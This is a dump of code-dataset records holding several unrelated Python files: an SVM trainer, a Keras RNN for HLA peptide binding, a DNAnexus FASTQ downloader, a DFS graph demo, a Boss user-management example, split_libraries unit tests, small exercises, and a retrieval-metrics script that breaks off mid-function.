np.sign(np.dot(inputs, self.weights))\n\n def train(self, trainingInputs, inputLabels):\n features = copy.deepcopy(trainingInputs)\n labels = copy.deepcopy(inputLabels)\n comb = list(zip(features, labels))\n\n for e in range(1, self.epochs + 1):\n random.shuffle(comb)\n\n for inputs, label in comb:\n\n if label * np.dot(inputs, self.weights) <= 1:\n self.weights *= (1 - self.learningRate)\n self.weights += self.learningRate * self.regularization * label * inputs\n else:\n self.weights *= 1 - self.learningRate\n\n self.learningRate = self.initLearningRate / (1 + e)\n\n\n return self.weights\n\n def evaluate(self, testInputs, testLabels):\n totErrors = 0\n for inputs, label in zip(testInputs, testLabels):\n if label != self.predict(inputs):\n totErrors += 1\n return 1 - (totErrors / len(testLabels))","sub_path":"svm_random_forest_ensemble/svm.py","file_name":"svm.py","file_ext":"py","file_size_in_byte":1451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"389247390","text":"# -*- coding: utf-8 -*-\n#including chemistry information\nfrom __future__ import print_function\nfrom keras.models import Sequential, slice_X\nfrom keras.layers.core import Activation, Masking, Dropout, Dense, RepeatVector\nfrom keras.layers import recurrent\nfrom keras.callbacks import ModelCheckpoint\nfrom utilities import *\n\n# model reconstruction from JSON:\nfrom keras.models import model_from_json\npath_save_train = '/scratch/users/bchen45/HLA_prediction/RNN_data/training_files/'\npath_save = '/scratch/users/bchen45/HLA_prediction/RNN_data/performance/'\n# how to use the model elsewhere...\n#model = model_from_json(open('my_model_architecture.json').read())\n#model.load_weights('my_model_weights.h5')\n\n##import coding dictionary\npath_dict = '/scratch/users/bchen45/code/python_general/python_general/encoding_dict/'\n#Blosum50_sparse.dict\n#Blosum50_only.dict\n#Sparse_only.dict\ndict_name = 'Blosum50_sparse.dict'\ndict_aa = pickle.load(open(path_dict+dict_name,'r'))\n\n# Parameters for the model and dataset\n#TRAINING_SIZE = len(inputs)\n# Try replacing JZS1 with LSTM, GRU, or SimpleRNN\nRNN = recurrent.JZS1\nfirst_run = True\n#default iteration 20 for the first run, iteration 40\nn_iteration_1 = 51\nn_iteration_2 = 31\nHIDDEN_SIZE = 16\nBATCH_SIZE = 20\nLAYERS = 2\nratio_t = 1\nchars = 'ARNDCQEGHILKMFPSTWYVBZX'#'0123456789+ '\nif dict_name == 'Blosum50_sparse.dict':\n chars = chars + chars\nclasses = [0,1]\n \n\n#start a model\nmodel = Sequential()\n# \"Encode\" the input sequence using an RNN, producing an output of HIDDEN_SIZE\n#model.add(Masking())\nmodel.add(RNN(HIDDEN_SIZE, input_shape=(None, len(chars)), return_sequences=True))\nfor _ in xrange(LAYERS-1):\n model.add(RNN(HIDDEN_SIZE, return_sequences=True))\n #model.add(Dropout(0.5))\nmodel.add(RNN(HIDDEN_SIZE, return_sequences=False))\nmodel.add(Dense(len(classes)))\nmodel.add(Activation('softmax'))\nmodel.compile(loss='categorical_crossentropy', optimizer='RMSprop')\n#adam\n#model1 = model\n#save the model\n#json_string = model.to_json()\n#open(path_save+file_name0+'_model.json', 'w').write(json_string)\n\n#encoding will take a string or char, string=sequence and to return a matrix of encoded peptide sequence\n#char = class, '0' = non-binding (0,1), '1' = binding (1,0)\ndef encoding_line(str0, max_len):\n #print(type(dict_aa['A']))\n #print(type(list(dict_aa['A'])))\n #print(type(max_len))\n if len(str0) == 1:\n coded0 = np.zeros(2)\n if str0 == '0':\n coded0[0] = 1\n else:\n coded0[1] = 1\n else:\n coded0 = np.zeros((max_len,len(list(dict_aa['A']))))\n for i,char0 in enumerate(str0):\n coded0[i,:] = dict_aa[char0] \n #print(str0)\n #print(coded0)\n return coded0\n\ndef encoding(matrix0, input0, len0):\n for i, sentence in enumerate(input0):\n matrix0[i] = encoding_line(sentence, len0)\n return matrix0\n\ndef output_perf(file_out, file_name0, iteraions,training_n, train_pre,train_recall,val_pre,val_recall):\n file_out.write(file_name0+'_training_n '+training_n+'\\n')\n file_out.write(file_name0+'_'+'iterations'+'\\t')\n for x0 in iterations:\n file_out.write(x0+'\\t')\n file_out.write('\\n')\n file_out.write(file_name0+'_'+'Training_precision'+'\\t')\n for x0 in train_pre:\n file_out.write(x0+'\\t')\n file_out.write('\\n')\n file_out.write(file_name0+'_'+'Training_recall'+'\\t')\n for x0 in train_recall:\n file_out.write(x0+'\\t')\n file_out.write('\\n')\n file_out.write(file_name0+'_'+'Validation_precision'+'\\t')\n for x0 in val_pre:\n file_out.write(x0+'\\t')\n file_out.write('\\n')\n file_out.write(file_name0+'_'+'Validation_recall'+'\\t')\n for x0 in val_recall:\n file_out.write(x0+'\\t')\n file_out.write('\\n')\n file_out.close()\n\nfor file_name0 in open(path_save_train+'file_names_decluster.csv'):\n #model = model1\n file_name0 = file_name0.rstrip()\n inputs=[]\n outputs=[]\n char_set = set([' '])\n class_set = set()\n max_len = 0\n X_train = []\n X_train_p = []\n X_train_n = []\n X_val_p = []\n X_val_n = []\n y_train = []\n y_val_p = []\n y_val_n = []\n #file_name0 ='HLADRB10401simplev1_tr_1_val.csv'\n for line in fileinput.input(path_save_train+file_name0):\n in_,out_ = [x.rstrip() for x in line.split(\"\\t\")]\n if len(out_) != 1:\n raise Exception(\"Output should be single characer\")\n else:\n if out_ == '0' :\n X_train_n.append(in_)\n X_train.append(in_)\n y_train.append(out_)\n elif out_ == '1':\n X_train_p.append(in_)\n X_train.append(in_)\n y_train.append(out_)\n else:\n out_ = str(int(out_) -2)\n if out_ == '0':\n X_val_n.append(in_)\n y_val_n.append(out_)\n else:\n X_val_p.append(in_)\n y_val_p.append(out_)\n \n max_len = max([max_len,len(in_),len(out_)])\n inputs.append(in_)\n outputs.append(out_)\n \n #for c in in_: char_set.add(c)\n class_set.add(out_)\n file_name0 = file_name0.split('.')[0] \n \n #creating encoding table\n print(class_set)\n classes = ''.join(class_set)\n #ctable = CharacterTable(chars, MAXLEN)\n #classtable = CharacterTable(classes, 1)\n MAXLEN = max_len #DIGITS + 1 + DIGITS\n #create training or validation matrix\n X_train_m = np.zeros((len(X_train), MAXLEN, len(chars)), dtype=np.bool)\n X_val_p_m = np.zeros((len(X_val_p), MAXLEN, len(chars)), dtype=np.bool)\n X_val_n_m = np.zeros((len(X_val_n), MAXLEN, len(chars)), dtype=np.bool)\n X_train_p_m = np.zeros((len(X_train_p), MAXLEN, len(chars)), dtype=np.bool)\n X_train_n_m = np.zeros((len(X_train_n), MAXLEN, len(chars)), dtype=np.bool)\n y_train_m = np.zeros((len(y_train), len(classes)), dtype=np.bool)\n y_val_p_m = np.zeros((len(y_val_p), len(classes)), dtype=np.bool)\n y_val_n_m = np.zeros((len(y_val_n), len(classes)), dtype=np.bool)\n \n X_train = encoding(X_train_m, X_train,MAXLEN)\n X_train_p = encoding(X_train_p_m, X_train_p,MAXLEN)\n X_train_n = encoding(X_train_n_m, X_train_n,MAXLEN)\n X_val_p = encoding(X_val_p_m, X_val_p,MAXLEN)\n X_val_n = encoding(X_val_n_m, X_val_n,MAXLEN)\n y_train = encoding(y_train_m, y_train,1)\n y_val_p = encoding(y_val_p_m, y_val_p,1)\n y_val_n = encoding(y_val_n_m, y_val_n,1)\n \n X_val = np.concatenate((X_val_n,X_val_p))\n y_val = np.concatenate((y_val_n,y_val_p))\n print(len(X_train),len(X_val))\n print(\"loaded input\")\n\n #Create checkpoint\n #checkpointer = ModelCheckpoint(filepath=model_name+'.weight', verbose=1, save_best_only=True)\n # Train the model each generation and show predictions against the validation dataset\n #file_out = open(path_save+'model_performance_chemv2.csv','a')\n version = '_chem_fixed_decluster_16'\n if os.path.isfile(path_save+'model_performance'+version+'.csv'): \n file_out = open(path_save+'model_performance'+version+'.csv','a')\n else:\n file_out = open(path_save+'model_performance'+version+'.csv','w+')\n iterations = []\n train_pre = []\n train_recall = []\n val_pre = []\n val_recall = []\n ptotal0 = len(X_train_p)\n ntotal0 = len(X_train_n)\n training_n = str(ptotal0+ntotal0)\n if first_run :\n n_iteration = n_iteration_1\n first_run = False\n else: \n n_iteration = n_iteration_2\n for iteration in range(1, n_iteration):\n iterations.append(str(iteration))\n print()\n print('-' * 50)\n print('Iteration', iteration)\n \n model.fit(X_train, y_train, batch_size=BATCH_SIZE, nb_epoch=1, class_weight={1:1,0:1.0/ratio_t/2},validation_data=(X_val, y_val),show_accuracy=True) \n #####predicting training\n ptotal0 = len(X_train_p)\n ntotal0 = len(X_train_n)\n #print('Train_Postive')\n #print(model.predict_classes(X_val_p)) \n tp0 = sum(model.predict_classes(X_train_p))+0.1\n #print('Train_Negative')\n #print(model.predict_classes(X_val_n)) \n fp0 = sum(model.predict_classes(X_train_n))\n tn0 = ntotal0 - fp0\n fn0 = ptotal0 - tp0\n train_pre.append(str(float(tp0)/(tp0+fp0)))\n train_recall.append(str(float(tp0)/(tp0+fn0)))\n print('Train_Precision='+str(float(tp0)/(tp0+fp0)))\n print('Train_Recall='+str(float(tp0)/(tp0+fn0)))\n \n ######predicting validation\n #print('Val_Postive')\n #print(model.predict_classes(X_val_p)) \n ptotal0 = len(X_val_p)\n ntotal0 = len(X_val_n)\n tp0 = sum(model.predict_classes(X_val_p))+0.1\n #print('Val_Negative')\n #print(model.predict_classes(X_val_n)) \n fp0 = sum(model.predict_classes(X_val_n))\n tn0 = ntotal0 - fp0\n fn0 = ptotal0 - tp0\n val_pre.append(str(float(tp0)/(tp0+fp0)))\n val_recall.append(str(float(tp0)/(tp0+fn0)))\n print('Val_Precision='+str(float(tp0)/(tp0+fp0)))\n print('Val_Recall='+str(float(tp0)/(tp0+fn0)))\n #save weights and performance info\n output_perf(file_out,file_name0,iterations,training_n, train_pre,train_recall,val_pre,val_recall)\n #model.save_weights(path_save+file_name0+'_chemv1_weight.h5',overwrite=True)\n","sub_path":"scripts_sh_verified/Old_HLA_RNN/HLA_RNN_classifier_spar_chem_v12_mutli_train_decluster.py","file_name":"HLA_RNN_classifier_spar_chem_v12_mutli_train_decluster.py","file_ext":"py","file_size_in_byte":9358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"74037721","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n###\n# © 2018 The Board of Trustees of the Leland Stanford Junior University\n# Nathaniel Watson\n# nathankw@stanford.edu\n###\n\n\"\"\"\nTo fill in.\n\"\"\"\n\nimport os\nimport subprocess\nimport logging\nimport argparse\nimport pdb\nimport re\nimport sys\n\nimport dxpy\n\nimport scgpm_seqresults_dnanexus.dnanexus_utils\n#import encode.dcc_submit as en #module load gbsc/encode/prod\nimport gbsc_dnanexus.utils #load the environment module gbsc/gbsc_dnanexus\n\ndef get_parser():\n parser = argparse.ArgumentParser(description=__doc__,formatter_class=argparse.RawTextHelpFormatter)\n\n parser.add_argument(\"--errlog\",required=True,help=\"\"\"\n Log file name to write errors to (i.e. When a DNAnexus project isn't found). Will be opened \n in append mode.\"\"\")\n\n parser.add_argument('-l',\"--library-name\",help=\"\"\"\n The library name of the sample that was sequenced. This is name of the library that was \n submitted to SCGPM for sequencing. This is added as a property to all sequencing result \n projects through the 'library_name' project property.\"\"\")\n\n parser.add_argument(\"--uhts-run-name\",help=\"\"\"\n The name of the sequencing run in UHTS. This is added as a property to all projects in \n DNAnexus through the 'seq_run_name' project property. Use this option in combination with \n --library-name and --lane to further restrict the search space, which is useful especially \n since multiple DNAnexus projects can have the same library_name property value (i.e. if \n resequencing the same library).\"\"\")\n\n parser.add_argument(\"--dx-project-name\",help=\"\"\"\n The name of the sequencing run project in DNAnexus.\"\"\")\n\n parser.add_argument(\"--lane\",type=int,help=\"\"\"\n The lane number of the flowcell on which the library was sequenced. This is added as a \n property to all projects in DNAnexus through the 'seq_lane_index' property. Use this in \n conjunction with --library-name and --uhts-run-name to further restrict the project search space.\"\"\")\n\n parser.add_argument('-b',\"--barcode\",nargs=\"+\",help=\"\"\"\n The barcode of the sequenced sample. If specified, then only FASTQs with these barcodes will \n be downloaded. Otherwise, all FASTQs will be downloaded.\"\"\")\n\n parser.add_argument(\"-d\",\"--file-download-dir\",required=True,help=\"\"\"\n Local directory in which to download the FASTQ files.\"\"\")\n\n parser.add_argument(\"--not-found-error\",action=\"store_true\",help=\"\"\"\n Presence of this options means to raise an Exception if a project can't be found on DNAnexus \n with the provided input.\"\"\")\n return parser\n\ndef main():\n debug_logger = logging.getLogger(__name__)\n parser = get_parser()\n args = parser.parse_args()\n library_name = args.library_name\n uhts_run_name = args.uhts_run_name\n dx_project_name = args.dx_project_name\n lane = args.lane\n barcodes = args.barcode\n file_download_dir = args.file_download_dir\n if not os.path.exists(file_download_dir):\n os.makedirs(file_download_dir)\n not_found_error = args.not_found_error\n \n dxsr = scgpm_seqresults_dnanexus.dnanexus_utils.DxSeqResults(library_name=library_name,uhts_run_name=uhts_run_name,dx_project_name=dx_project_name,sequencing_lane=lane)\n if dxsr.dx_project_id:\n for b in barcodes:\n dxsr.download_fastqs(barcode=b,dest_dir=file_download_dir)\n else:\n log_msg = \"\"\"Could not find DNAnexus project for input of:\n DNAnexus User Name : {user}\n Library Name : {lib}\n UHTS Run Name: : {uhts}\n DNAnexus Project Name: {p}\n Sequencing Lane : {lane}\n \\n\"\"\".format(user=scgpm_seqresults_dnanexus.dnanexus_utils.get_dx_username(strip_prefix=True),lib=library_name,uhts=uhts_run_name,p=dx_project_name,lane=lane)\n debug_logger.critical(log_msg)\n \n if not_found_error:\n msg = \"Could not find DNAnexus project.\"\n raise gbsc_dnanexus.utils.DxProjectNotFound(msg)\n \n #fastq_dico: Keys are the file names of the FASTQs and values are the fully qualified paths to the FASTQs.\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"scgpm_seqresults_dnanexus/scripts/download_fastqs.py","file_name":"download_fastqs.py","file_ext":"py","file_size_in_byte":4023,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"335113876","text":"class Vertex():\n def __init__(self,data):\n self.data = data\n self.adjList = []\n self.edges_source = []\n self.color = \"white\"\n self.parent = None\n self.d = 0\n self.f = 0\n\nclass Edge():\n def __init__(self,source,target):\n source.adjList.append(target)\n self.source = source\n self.target = target\n self.data = None\n \nclass Graph():\n def __init__(self):\n self.vertexset = []\n self.edgeset = []\n \n def insert_vertex(self,vertex):\n self.vertexset.append(vertex)\n \n def insert_edge(self,source,target):\n edge = Edge(source,target)\n source.edges_source.append(edge)\n self.edgeset.append(edge)\n \n \ntime = 0\ndef DFS(graph):\n for vertex in graph.vertexset:\n if vertex.color == \"white\":\n DFS_Visit(graph,vertex)\n\ndef CLEAR(graph):\n for v in graph.vertexset:\n v.color = \"white\"\n for e in graph.edgeset:\n e.data = None \n \ndef DFS_Visit(graph,u):\n global time\n time = time+1\n u.d = time\n u.color = \"gray\"\n for v in u.adjList:\n if v.color == \"white\":\n v.parent = u\n DFS_Visit(graph,v)\n elif v.color == \"gray\":\n a=what_edge(u.data,v.data,graph.edgeset)\n a.data=\"B\"\n \n else:\n if v.d > u.d :\n a=what_edge(u.data,v.data,graph.edgeset)\n a.data=\"F\"\n elif u.d > v.d:\n a=what_edge(u.data,v.data,graph.edgeset)\n a.data=\"C\"\n u.color = \"black\"\n time = time+1\n u.f = time\n \ndef what_edge (origin, end, lista):\n for i in lista:\n if i.source.data == origin and i.target.data == end:\n return i\n return None\n\ndef path(start, end, graph):\n CLEAR(graph)\n DFS_Visit(graph,start)\n path_aux(start, end, [], [])\n \n\ndef path_aux(start, end, walk, trash):\n neighbors = start.edges_source\n walk_now = walk.copy()\n walk_now.append(start.data)\n if start.data == end.data:\n print(walk_now)\n else:\n for edge in neighbors:\n trash_now = trash.copy()\n if edge.data == \"B\":\n if edge in trash_now:\n pass\n else:\n trash_now.append(edge)\n path_aux(edge.target,end,walk_now,trash_now)\n else:\n path_aux(edge.target,end,walk_now,trash_now)\n\n \ng=Graph()\na = Vertex(\"a\")\nb = Vertex(\"b\")\nc = Vertex(\"c\")\nd = Vertex(\"d\")\ne = Vertex(\"e\")\nf = Vertex(\"f\")\ng.insert_vertex(a)\ng.insert_vertex(b)\ng.insert_vertex(c)\ng.insert_vertex(d)\ng.insert_vertex(e)\ng.insert_vertex(f)\n\ng.insert_edge(a,b)\ng.insert_edge(a,c)\ng.insert_edge(a,d)\ng.insert_edge(a,e)\ng.insert_edge(b,c)\ng.insert_edge(b,f)\ng.insert_edge(c,d)\ng.insert_edge(d,a)\ng.insert_edge(d,e)\n\n\nfor vert_s in g.vertexset:\n for vert_t in g.vertexset:\n if vert_t != vert_s:\n print( \"\\n\" + str(vert_s.data) + \" -> \" + str(vert_t.data))\n path(vert_s, vert_t, g)\n","sub_path":"grupo_PaulaDaco_HenriqueMuniz.py","file_name":"grupo_PaulaDaco_HenriqueMuniz.py","file_ext":"py","file_size_in_byte":3112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"208323919","text":"# Copyright 2016 The Johns Hopkins University Applied Physics Laboratory\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"\nThis example demonstrates user management. To run this example, you must have \na user with either the user-manager role or the admin role.\n\"\"\"\n\nfrom ndio.remote.boss.remote import Remote, LATEST_VERSION\nfrom ndio.ndresource.boss.resource import *\nfrom requests import HTTPError\n\nAPI_VER = LATEST_VERSION\nrmt = Remote('example.cfg')\n#rmt = Remote('test.cfg')\nrmt.group_perm_api_version = API_VER\n\n# Turn off SSL cert verification. This is necessary for interacting with\n# developer instances of the Boss.\nimport requests\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\nrmt.project_service.session_send_opts = { 'verify': False }\nrmt.metadata_service.session_send_opts = { 'verify': False }\nrmt.volume_service.session_send_opts = { 'verify': False }\n\nuser = 'example_user'\n\nprint('Creating user . . .')\nrmt.user_add(user, 'John', 'Doe', 'jd@me.com', 'secure_password')\n\nprint('\\nGet the user just created . . .')\nuser_data = rmt.user_get(user)\nprint(user_data)\n\nprint('\\nMake the user a resource manager . . .')\nrmt.user_add_role(user, 'resource-manager')\n\nprint('\\nList the user\\'s roles . . .')\nprint(rmt.user_get_roles(user))\n\nprint('\\nRemove the resource manager role . . .')\nrmt.user_delete_role(user, 'resource-manager')\n\nprint('\\nList the user\\'s roles again. . .')\nprint(rmt.user_get_roles(user))\n\nprint('\\nList the user\\'s groups . . .')\nprint(rmt.user_get_groups(user))\n\nprint('\\nClean up be deleting the user . . .')\nrmt.user_delete(user)\n","sub_path":"examples/user_ex.py","file_name":"user_ex.py","file_ext":"py","file_size_in_byte":2161,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"78433600","text":"# -----------------------------------------------------------------------------\n# Copyright (c) 2014--, The Qiita Development Team.\n#\n# Distributed under the terms of the BSD 3-clause License.\n#\n# The full license is in the file LICENSE, distributed with this software.\n# -----------------------------------------------------------------------------\n\nfrom unittest import TestCase, main\nfrom os.path import isdir, exists, join\nfrom os import remove\nfrom shutil import rmtree\nfrom tempfile import mkdtemp\n\nfrom tgp.split_libraries.split_libraries import (\n generate_parameters_string, generate_process_sff_commands,\n generate_split_libraries_cmd)\n\n\nclass SplitLibrariesTests(TestCase):\n def setUp(self):\n self._clean_up_files = []\n\n def tearDown(self):\n for fp in self._clean_up_files:\n if exists(fp):\n if isdir(fp):\n rmtree(fp)\n else:\n remove(fp)\n\n def test_generate_parameters_string(self):\n parameters = {\n \"min_seq_len\": 200, \"max_seq_len\": 1000, \"trim_seq_length\": False,\n \"min_qual_score\": 25, \"max_ambig\": 6, \"max_homopolymer\": 6,\n \"max_primer_mismatch\": 0, \"barcode_type\": \"golay_12\",\n \"max_barcode_errors\": 1.5, \"disable_bc_correction\": False,\n \"qual_score_window\": 0, \"disable_primers\": False,\n \"reverse_primers\": \"disable\", \"reverse_primer_mismatches\": 0,\n \"truncate_ambi_bases\": False, \"input_data\": 1}\n obs = generate_parameters_string(parameters)\n exp = (\"--min_seq_len 200 --max_seq_len 1000 --min_qual_score 25 \"\n \"--max_ambig 6 --max_homopolymer 6 --max_primer_mismatch 0 \"\n \"--barcode_type golay_12 --max_barcode_errors 1.5 \"\n \"--qual_score_window 0 --reverse_primer_mismatches 0 \"\n \"--reverse_primers disable\")\n self.assertEqual(obs, exp)\n\n def test_generate_parameters_string_error(self):\n parameters = {\n \"min_seq_len\": 200, \"max_seq_len\": 1000, \"trim_seq_length\": False,\n \"min_qual_score\": 25, \"max_ambig\": 6, \"max_homopolymer\": 6,\n \"max_primer_mismatch\": 0, \"barcode_type\": \"golay_12\",\n \"max_barcode_errors\": 1.5, \"disable_bc_correction\": False,\n \"qual_score_window\": 0, \"disable_primers\": False,\n \"reverse_primers\": \"whops\", \"reverse_primer_mismatches\": 0,\n \"truncate_ambi_bases\": False, \"input_data\": 1}\n with self.assertRaises(ValueError):\n generate_parameters_string(parameters)\n\n def test_generate_process_sff_commands(self):\n out_dir = \"/directory/output/\"\n sff_fps = [\"/directory/file1.sff\", \"/directory/file2.sff.gz\"]\n obs_cmds, obs_seqs, obs_quals = generate_process_sff_commands(\n sff_fps, out_dir)\n\n exp_cmds = [\n \"process_sff.py -i /directory/file1.sff -o /directory/output/\",\n \"process_sff.py -i /directory/file2.sff.gz -o /directory/output/\"]\n exp_seqs = [\"/directory/output/file1.fna\",\n \"/directory/output/file2.fna\"]\n exp_quals = [\"/directory/output/file1.qual\",\n \"/directory/output/file2.qual\"]\n\n self.assertEqual(obs_cmds, exp_cmds)\n self.assertEqual(obs_seqs, exp_seqs)\n self.assertEqual(obs_quals, exp_quals)\n\n def test_generate_split_libraries_cmd_single(self):\n test_dir = mkdtemp()\n self._clean_up_files.append(test_dir)\n seqs = [join(test_dir, \"seqs.fna\")]\n quals = [join(test_dir, \"seqs.qual\")]\n mapping_file = join(test_dir, \"mapping_file.txt\")\n with open(mapping_file, 'w') as f:\n f.write(MAPPING_FILE_SINGLE)\n out_dir = join(test_dir, 'sl_out')\n params = {\n \"min_seq_len\": 200, \"max_seq_len\": 1000, \"trim_seq_length\": False,\n \"min_qual_score\": 25, \"max_ambig\": 6, \"max_homopolymer\": 6,\n \"max_primer_mismatch\": 0, \"barcode_type\": \"golay_12\",\n \"max_barcode_errors\": 1.5, \"disable_bc_correction\": False,\n \"qual_score_window\": 0, \"disable_primers\": False,\n \"reverse_primers\": \"disable\", \"reverse_primer_mismatches\": 0,\n \"truncate_ambi_bases\": False, \"input_data\": 1}\n obs_cmd, obs_outdir = generate_split_libraries_cmd(\n seqs, quals, mapping_file, out_dir, params)\n exp_cmd = [\n \"split_libraries.py -f {0}/seqs.fna -m {0}/mapping_file.txt \"\n \"-q {0}/seqs.qual -d -o {0}/sl_out --min_seq_len 200 \"\n \"--max_seq_len 1000 --min_qual_score 25 --max_ambig 6 \"\n \"--max_homopolymer 6 --max_primer_mismatch 0 \"\n \"--barcode_type golay_12 --max_barcode_errors 1.5 \"\n \"--qual_score_window 0 --reverse_primer_mismatches 0 \"\n \"--reverse_primers disable\".format(test_dir)]\n self.assertEqual(obs_cmd, exp_cmd)\n self.assertEqual(obs_outdir, [out_dir])\n\n def test_generate_split_libraries_cmd_mutliple(self):\n test_dir = mkdtemp()\n self._clean_up_files.append(test_dir)\n seqs = [join(test_dir, \"prefix_1_seqs.fna\"),\n join(test_dir, \"prefix_2_seqs.fna\")]\n quals = [join(test_dir, \"prefix_1_seqs.qual\"),\n join(test_dir, \"prefix_2_seqs.qual\")]\n mapping_file = join(test_dir, \"mapping_file.txt\")\n with open(mapping_file, 'w') as f:\n f.write(MAPPING_FILE_MULT)\n out_dir = join(test_dir, 'sl_out')\n params = {\n \"min_seq_len\": 200, \"max_seq_len\": 1000, \"trim_seq_length\": False,\n \"min_qual_score\": 25, \"max_ambig\": 6, \"max_homopolymer\": 6,\n \"max_primer_mismatch\": 0, \"barcode_type\": \"golay_12\",\n \"max_barcode_errors\": 1.5, \"disable_bc_correction\": False,\n \"qual_score_window\": 0, \"disable_primers\": False,\n \"reverse_primers\": \"disable\", \"reverse_primer_mismatches\": 0,\n \"truncate_ambi_bases\": False, \"input_data\": 1}\n obs_cmd, obs_outdir = generate_split_libraries_cmd(\n seqs, quals, mapping_file, out_dir, params)\n exp_cmd = [\n \"split_libraries.py -f {0}/prefix_1_seqs.fna -m \"\n \"{0}/sl_out/mappings/prefix_1_mapping_file.txt -q \"\n \"{0}/prefix_1_seqs.qual -d -o {0}/sl_out/prefix_1_mapping_file \"\n \"-n 1 --min_seq_len 200 --max_seq_len 1000 --min_qual_score 25 \"\n \"--max_ambig 6 --max_homopolymer 6 --max_primer_mismatch 0 \"\n \"--barcode_type golay_12 --max_barcode_errors 1.5 \"\n \"--qual_score_window 0 --reverse_primer_mismatches 0 \"\n \"--reverse_primers disable\".format(test_dir),\n \"split_libraries.py -f {0}/prefix_2_seqs.fna -m \"\n \"{0}/sl_out/mappings/prefix_2_mapping_file.txt -q \"\n \"{0}/prefix_2_seqs.qual -d -o {0}/sl_out/prefix_2_mapping_file \"\n \"-n 800000 --min_seq_len 200 --max_seq_len 1000 --min_qual_score \"\n \"25 --max_ambig 6 --max_homopolymer 6 --max_primer_mismatch 0 \"\n \"--barcode_type golay_12 --max_barcode_errors 1.5 \"\n \"--qual_score_window 0 --reverse_primer_mismatches 0 \"\n \"--reverse_primers disable\".format(test_dir)]\n self.assertEqual(obs_cmd, exp_cmd)\n exp_outdir = [join(out_dir, 'prefix_1_mapping_file'),\n join(out_dir, 'prefix_2_mapping_file')]\n self.assertEqual(obs_outdir, exp_outdir)\n\n def test_split_libraries(self):\n # This requires to run split libraries so I don't think that we want\n # to run a test in here - at least, not until we split up the plugin\n # to its own project\n pass\n\n\nMAPPING_FILE_SINGLE = (\n \"#SampleID\\tBarcodeSequence\\tLinkerPrimerSequence\\tDescription\\n\"\n \"Sample1\\tGTCCGCAAGTTA\\tGTGCCAGCMGCCGCGGTAA\\tTGP test\\n\"\n \"Sample2\\tCGTAGAGCTCTC\\tGTGCCAGCMGCCGCGGTAA\\tTGP test\\n\"\n)\n\n\nMAPPING_FILE_MULT = (\n \"#SampleID\\tBarcodeSequence\\tLinkerPrimerSequence\\trun_prefix\\t\"\n \"Description\\n\"\n \"Sample1\\tGTCCGCAAGTTA\\tGTGCCAGCMGCCGCGGTAA\\tprefix_1\\tTGP test\\n\"\n \"Sample2\\tCGTAGAGCTCTC\\tGTGCCAGCMGCCGCGGTAA\\tprefix_2\\tTGP test\\n\"\n)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"qiita_plugins/target_gene/tgp/split_libraries/tests/test_split_libraries.py","file_name":"test_split_libraries.py","file_ext":"py","file_size_in_byte":8182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"512539499","text":"from random import randint\n\ndef total(number, rate, paid = 0, init = 0):\n print('the number was {}'.format(number))\n while init <= number:\n paid += 1\n init = paid * 2 \n items = dict(paid = paid, due = rate * paid)\n return items.items()\n\nprint(total(randint(0, 10000), 85))\n\ndef sel_tier(svc, time):\n print('{} hours used'.format(time))\n","sub_path":"bill.py","file_name":"bill.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"161506194","text":"# -*- coding: utf-8 -*-\nimport math\n#COMECE AQUI ABAIXO\ndef crescente(a):\n cont=0\n for i in range(0,len(a),1):\n if a[i] 3:\n result += 1\n return result / len(assessment)\n\n\ndef CG(assessment):\n result = 0\n for r in assessment:\n result += r\n return result\n\n\ndef DCG(assessment):\n result = 0\n i = 1\n for r in assessment:\n result += (2**r - 1) / math.log2(i+1)\n i += 1\n return result\n\n\ndef NDCG(assessment):\n return DCG(assessment) / (5 * len(assessment))\n\n\ndef ERR(assessment):\n p = [1, 0.9, 0.8, 0.7, 0.6]\n result = 0\n i = 1\n for _ in assessment:\n result += p[i-1]/i\n i += 1\n return result\n\n\ndef to_format(number, precision=2):\n return format(number, '.'+str(precision)+'f')\n\n\ndef estimate(assessment_file_name, estimate_result_file_name):\n assessment_file = open(assessment_file_name, 'r', encoding='utf-8')\n result = open(estimate_result_file_name, 'w', encoding='utf-8')\n\n google_data = []\n wikipedia_data = []\n lab_data = []\n for line in assessment_file:\n data = [int(x) for x in line.split()]\n google_data.append(data[0:5])\n wikipedia_data.append(data[5:10])\n lab_data.append(data[10:])\n\n for engine_name, engine_data in [['google', google_data], ['wikipedia', wikipedia_data], ['lab', lab_data]]:\n result.write(engine_name + '\\n')\n avr_P = [0] * 3\n avr_CG = [0] * 3\n avr_DCG = [0] * 3\n avr_NDCG = [0] * 3\n avr_ERR = [0] * 3\n for assessment in engine_data:\n avr_P[0] += P(assessment[0:1])\n avr_P[1] += P(assessment[0:3])\n avr_P[2] += P(assessment)\n result.write(to_format(P(assessment[0:1])) + ' ' + to_format(P(assessment[0:3])) + ' '\n + to_format(P(assessment)) + '\\n')\n avr_CG[0] += CG(assessment[0:1])\n avr_CG[1] += CG(assessment[0:3])\n avr_CG[2] += CG(assessment)\n result.write( to_format(CG(assessment[0:1])) + ' '+ to_format(CG(assessment[0:3])) + ' '\n + to_format(CG(assessment)) + '\\n')\n avr_DCG[0] += DCG(assessment[0:1])\n avr_DCG[1] += DCG(assessment[0:3])\n avr_DCG[2] += DCG(assessment)\n 